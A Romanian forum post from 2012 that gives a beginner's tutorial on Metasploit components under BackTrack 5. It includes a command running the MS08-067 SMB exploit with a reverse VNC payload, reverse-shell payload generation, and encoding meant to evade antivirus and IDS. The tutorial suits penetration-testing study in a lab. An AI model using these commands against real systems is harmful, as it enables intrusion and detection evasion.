Wubi Posted July 17, 2012 Report Posted July 17, 2012 Termenii MetasploitMSFconsoleMSFcliArmitageMSFpayloadMSFencodeMetasploit e un tool valoros in pen testing, ce poate deveni destul de confuz pentru un incepator. Tutorialul asta despre metasploit te va ajuta sa rulezi metasploit. Probabil ca multe dintre tintele tale vor fi sisteme ce ruleaza pe Windows.Daca esti interesat, recomand sa citesti, Amazon.com: Metasploit: The Penetration Tester's Guide (9781593272883): David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni: BooksO carte ce iti va arata cele mai multe dintre framework-urile metasploit, ce te lasa sa descoperi singur adevarata "putere" a metasploit. In orice caz, chiar o recomand.1. Termenii MetasploitExploit - sa profiti de o bresa de securitate, in cadrul unui sistem, retea sau aplicatie.Payload - este codul pe care computerul victimei il va executa in framework-ul metasploit.Module - o mica parte de cod ce poate fi adaugata la framework-ul metasploit pentru a executa un atac.Shellcode - o mica parte de cod folosita ca payload.2. MSFConsoleMsfconsole este o interfata cu majoritatea caracteristicilor din metasploit. Msfconsle poate fi folosita pentru a porni atacuri, crearea de "listen-eri", si multe, multe altele. Vom folosi Msfconsole pe parcursul acestui tutorial.Metasploit vine instalat implicit pe backtrack 5. Pentru a accesa msfconsole, deschde terminalul si scrie:root@bt:~# cd /opt/metasploit/msf3root@bt:/opt/metasploit/msf3# msfconsoleDaca ai nevoie de ajutor, pentru a vedea fisierele "help", pur si simplu scrie help urmat de comanda despre care vrei sa afli mai multe. In cazul nostru, vrem sa aflam mai multe despre comanda connect. Aceasta ne permite sa comunicam cu un host.msf > help connect3. MSFcliMSFcli este o alta cale de a accesa framework-ul metasploit dar se concentreaza mai mult pe scripting si interpretabilitate. Pentru a vedea mai multe despre msfcli:root@bt:~# cd /opt/metasploit/msf3root@bt:/opt/metasploit/msf3# msfcli -hAcum sa-i facem un mic "test drive" la msfcli. Poti vedea optiunile intr-un modul adaugand litera O la sfarsit de linie. Spre exemplu:root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapt oAcest modul are nevoie de 3 optiuni: RHOST, RPORT, si SMPIPE. Adaugand P la sfarsit ne permite sa vedem ce payloads putem folosi.root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 PPutem rula exploit-ul nostru selectand un payload, inserand optiunile, si rulandu`l punand litera E la sfarsit ca msfcli argument string.root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 PAYLOAD=windows/vncinject/reverse_tcp_dns ENota: IP-ul selectat ca RHOST este un VPS ce ruleaza pe Windows Server. Acesta va reactiona ca sistemul victimei, pentru teste. Vei fi nevoit sa faci la fel, cu un alt computer sau masina virtuala. Pentru "antrenament", nu actualiza sistemul victimei, sau nu insta un antivirus.4. Armitage1. Ruleaza comanda armitage2. Selecteaza Start MSF.Are GUI.5. MSFpayloadComponenta msfpayload a metasploit ce genereaza shellcode, si executa. Shellcode poate fi generat in mai multe feluri cum ar fi C, Ruby, JavaScript si chiar Visual Basic. Fiecare dintre acestea poate fi folositor in diverse situatii.Pentru ajutor in msfpayload poti scrie: root@bt~# msfpayload -hPrecum msfcli, daca ai nevoie sa gasesti optiunile necesare, pune la sfarsitul liniei litera O.root@bt:~# msfpayload windows/shell_reverse_tcp O6. MSFencodeShellcode-ul generat de msfpayload este functional, dar contine o gramada de caractere null care atunci cand sunt interpretate de majoritatea dintre programe, semnifica sfarsitul unui string, si asta va provoca codul pentru a termina inainte de compilare.In plus, shellcode-ul traverseaza o retea in cleartext ce paote fi preluat de sistemele de detectare a intruziunilor(IDSs) si programele antivirus. Pentru aceasta problema, dezvoltatorii Metasploit ofera msfencode, ce te ajuta sa eviti caracacterele defectuase si sa evite antivirusul si IDS-ul codificand payload-ul initial intr-un mod in care nu contine " "bad" characters ".Scrie,msfencode -h pentru o lista cu optiunile msfencode.Metasploit contine un numar de diferite encodari pentru situatii diferite. Unele vor fi folositoare can poti folosi numai caractere alfanumerice ca parte din payload, cum este in cazul formatului multor fisier sau alte aplicatii ce accepta numai caractere printabile ca input. Un foarte popular si bine cunoscut encoder este: x86/shikata_ga_nai.Pentru o lista cu encoderele disponibile, scrie,root@bt:~# msfencode -lReferinteMain Page - BackTrack LinuxBackTrack Tutorials Quote